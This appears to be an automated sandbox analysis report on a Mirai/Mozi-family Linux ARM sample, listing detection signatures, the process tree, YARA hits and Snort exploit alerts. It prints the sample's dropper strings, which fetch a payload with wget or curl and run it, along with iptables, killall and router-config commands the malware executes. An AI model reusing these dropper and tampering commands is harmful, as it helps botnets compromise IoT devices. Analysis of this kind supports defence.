Loading ...

Play interactive tourEdit tour

Analysis Report MGuvcs6Ocz

Overview

General Information

Sample Name:MGuvcs6Ocz
Analysis ID:397466
MD5:eec5c6c219535fba3a0492ea8118b397
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

Startup

  • system is lnxubuntu1
  • MGuvcs6Ocz (PID: 4582, Parent: 4519, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/MGuvcs6Ocz
    • MGuvcs6Ocz New Fork (PID: 4597, Parent: 4582)
      • MGuvcs6Ocz New Fork (PID: 4599, Parent: 4597)
        • sh (PID: 4601, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 4603, Parent: 4601)
          • killall (PID: 4603, Parent: 4601, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • MGuvcs6Ocz New Fork (PID: 4622, Parent: 4599)
          • sh (PID: 4635, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT"
            • sh New Fork (PID: 4637, Parent: 4635)
            • iptables (PID: 4637, Parent: 4635, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT
              • iptables New Fork (PID: 4641, Parent: 4637)
              • modprobe (PID: 4641, Parent: 4637, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • sh (PID: 4669, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT"
            • sh New Fork (PID: 4671, Parent: 4669)
            • iptables (PID: 4671, Parent: 4669, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT
          • sh (PID: 4672, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT"
            • sh New Fork (PID: 4674, Parent: 4672)
            • iptables (PID: 4674, Parent: 4672, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT
          • sh (PID: 4706, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT"
            • sh New Fork (PID: 4715, Parent: 4706)
            • iptables (PID: 4715, Parent: 4706, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT
          • sh (PID: 4733, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 44343 -j ACCEPT"
            • sh New Fork (PID: 4739, Parent: 4733)
            • iptables (PID: 4739, Parent: 4733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 44343 -j ACCEPT
          • sh (PID: 4754, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT"
            • sh New Fork (PID: 4758, Parent: 4754)
            • iptables (PID: 4758, Parent: 4754, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT
          • sh (PID: 4770, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT"
            • sh New Fork (PID: 4776, Parent: 4770)
            • iptables (PID: 4776, Parent: 4770, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT
          • sh (PID: 4787, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT"
            • sh New Fork (PID: 4795, Parent: 4787)
            • iptables (PID: 4795, Parent: 4787, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT
        • sh (PID: 4894, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 4898, Parent: 4894)
          • iptables (PID: 4898, Parent: 4894, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • sh (PID: 4912, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 4915, Parent: 4912)
          • iptables (PID: 4915, Parent: 4912, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • sh (PID: 4916, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 4918, Parent: 4916)
          • iptables (PID: 4918, Parent: 4916, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • sh (PID: 4919, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 4921, Parent: 4919)
          • iptables (PID: 4921, Parent: 4919, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • sh (PID: 4923, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • sh (PID: 4930, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • sh (PID: 4940, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 4949, Parent: 4940)
          • iptables (PID: 4949, Parent: 4940, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • sh (PID: 4967, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 4975, Parent: 4967)
          • iptables (PID: 4975, Parent: 4967, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • sh (PID: 4990, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 4999, Parent: 4990)
          • iptables (PID: 4999, Parent: 4990, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • sh (PID: 5015, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 5024, Parent: 5015)
          • iptables (PID: 5024, Parent: 5015, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • sh (PID: 5043, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 5051, Parent: 5043)
          • iptables (PID: 5051, Parent: 5043, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • sh (PID: 5067, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 5077, Parent: 5067)
          • iptables (PID: 5077, Parent: 5067, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • sh (PID: 5095, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 5103, Parent: 5095)
          • iptables (PID: 5103, Parent: 5095, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • sh (PID: 5119, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 5124, Parent: 5119)
          • iptables (PID: 5124, Parent: 5119, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • sh (PID: 5126, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 5128, Parent: 5126)
          • iptables (PID: 5128, Parent: 5126, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • sh (PID: 5129, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 5131, Parent: 5129)
          • iptables (PID: 5131, Parent: 5129, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • sh (PID: 5135, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 5142, Parent: 5135)
          • iptables (PID: 5142, Parent: 5135, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • sh (PID: 5159, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 5167, Parent: 5159)
          • iptables (PID: 5167, Parent: 5159, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • sh (PID: 5218, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT"
          • sh New Fork (PID: 5220, Parent: 5218)
          • iptables (PID: 5220, Parent: 5218, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT
        • sh (PID: 5221, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT"
          • sh New Fork (PID: 5223, Parent: 5221)
          • iptables (PID: 5223, Parent: 5221, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT
        • sh (PID: 5227, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT"
          • sh New Fork (PID: 5236, Parent: 5227)
          • iptables (PID: 5236, Parent: 5227, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT
        • sh (PID: 5257, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT"
          • sh New Fork (PID: 5267, Parent: 5257)
          • iptables (PID: 5267, Parent: 5257, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT
        • sh (PID: 5287, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 7723 -j ACCEPT"
          • sh New Fork (PID: 5295, Parent: 5287)
          • iptables (PID: 5295, Parent: 5287, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 7723 -j ACCEPT
        • sh (PID: 5297, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT"
          • sh New Fork (PID: 5299, Parent: 5297)
          • iptables (PID: 5299, Parent: 5297, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT
        • sh (PID: 5302, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT"
          • sh New Fork (PID: 5309, Parent: 5302)
          • iptables (PID: 5309, Parent: 5302, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT
        • sh (PID: 5328, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT"
          • sh New Fork (PID: 5337, Parent: 5328)
          • iptables (PID: 5337, Parent: 5328, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT
  • upstart New Fork (PID: 4813, Parent: 3310)
  • sh (PID: 4813, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4814, Parent: 4813)
    • date (PID: 4814, Parent: 4813, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4815, Parent: 4813)
    • apport-checkreports (PID: 4815, Parent: 4813, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 4840, Parent: 3310)
  • sh (PID: 4840, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4848, Parent: 4840)
    • date (PID: 4848, Parent: 4840, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4850, Parent: 4840)
    • apport-gtk (PID: 4850, Parent: 4840, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 4867, Parent: 3310)
  • sh (PID: 4867, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4871, Parent: 4867)
    • date (PID: 4871, Parent: 4867, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4877, Parent: 4867)
    • apport-gtk (PID: 4877, Parent: 4867, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
MGuvcs6OczSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
MGuvcs6OczJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    MGuvcs6OczJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      MGuvcs6OczJoeSecurity_Mirai_4Yara detected MiraiJoe Security

        PCAP (Network Traffic)

        SourceRuleDescriptionAuthorStrings
        dump.pcapJoeSecurity_Mirai_4Yara detected MiraiJoe Security

          Dropped Files

          SourceRuleDescriptionAuthorStrings
          /usr/networksSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
          • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
          /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
              /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus / Scanner detection for submitted sampleShow sources
                Source: MGuvcs6OczAvira: detected
                Antivirus detection for dropped fileShow sources
                Source: /usr/networksAvira: detection malicious, Label: LINUX/Mirai.lldau
                Multi AV Scanner detection for submitted fileShow sources
                Source: MGuvcs6OczVirustotal: Detection: 68%Perma Link
                Source: MGuvcs6OczMetadefender: Detection: 51%Perma Link
                Source: MGuvcs6OczReversingLabs: Detection: 68%

                Spreading:

                barindex
                Found strings indicative of a multi-platform dropperShow sources
                Source: MGuvcs6OczString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: MGuvcs6OczString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                Source: MGuvcs6OczString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Opens /proc/net/* files useful for finding connected devices and routersShow sources
                Source: /tmp/MGuvcs6Ocz (PID: 4622)Opens: /proc/net/route
                Source: /tmp/MGuvcs6Ocz (PID: 4622)Opens: /proc/net/route

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 188.1.231.30: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.234.3.129: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.255.155.208: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.220.101.122: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.81.29.141: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56650 -> 3.22.215.251:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56650 -> 3.22.215.251:80
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.72.92:8000 -> 192.168.2.20:7723
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 103.91.245.19:5214 -> 192.168.2.20:7723
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.56.30.160: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 125.227.149.119:24319 -> 192.168.2.20:7723
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:46712 -> 104.85.180.168:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:46712 -> 104.85.180.168:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.85.180.168:80 -> 192.168.2.20:46712
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 121.132.251.243:6881 -> 192.168.2.20:7723
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.46.89:4000 -> 192.168.2.20:7723
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.192.224.209:1027 -> 192.168.2.20:7723
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.218.87.244: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:52888 -> 109.67.247.125:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:52888 -> 109.67.247.125:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:51496 -> 13.226.101.83:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:41804 -> 99.192.234.217:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:51496 -> 13.226.101.83:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:41804 -> 99.192.234.217:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.199.60.36: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 31.22.82.187: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 38.122.22.118: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 45.169.165.229: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45344 -> 61.213.102.33:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45344 -> 61.213.102.33:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:49960 -> 154.201.250.66:80
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.139.206:2547 -> 192.168.2.20:7723
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.72.85:10481 -> 192.168.2.20:7723
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.58.178:55184 -> 192.168.2.20:7723
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.242.148.249: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.113.174:8081 -> 192.168.2.20:7723
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:43006 -> 185.29.123.11:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:56722 -> 164.132.9.223:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:56722 -> 164.132.9.223:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:43006 -> 185.29.123.11:80
                Source: TrafficSnort IDS: 2025884 ET EXPLOIT Multiple CCTV-DVR Vendors RCE 192.168.2.20:47166 -> 121.127.241.108:81
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 124.75.149.185: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.248.151.214: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.73.215.131: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 172.101.203.193: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 103.105.215.18: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.85.109: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 91.190.192.194: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:50256 -> 217.182.243.67:80
                Source: TrafficSnort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.20:42672 -> 146.184.165.4:5555
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:44594 -> 170.246.231.239:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:44594 -> 170.246.231.239:80
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.85.133.197: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.91.195.37: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56750 -> 50.66.70.68:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56750 -> 50.66.70.68:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.226.148.46: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 113.131.128.13: -> 192.168.2.20:
